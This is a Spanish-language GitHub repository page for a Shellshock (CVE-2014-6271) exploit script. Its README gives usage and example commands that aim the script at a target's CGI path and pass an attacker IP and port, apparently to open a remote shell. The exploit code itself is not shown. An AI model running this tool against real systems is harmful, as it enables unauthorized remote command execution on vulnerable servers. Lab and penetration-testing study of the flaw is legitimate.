Skip to content

Exploit para abusar de la vulnerabilidad Shellshock (CVE-2014-6271).

Notifications You must be signed in to change notification settings

TheRealCiscoo/Shellshock-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

Shellshock-Exploit

Este exploit abusa de la vulnerabilidad Shellshock (CVE-2014-6271) existente en bash a partir de su versión 1.14 hasta la 4.3.

Uso:

python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>

Ejemplo:

python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443

Más información sobre la vulnerabilidad:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271

About

Exploit para abusar de la vulnerabilidad Shellshock (CVE-2014-6271).

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages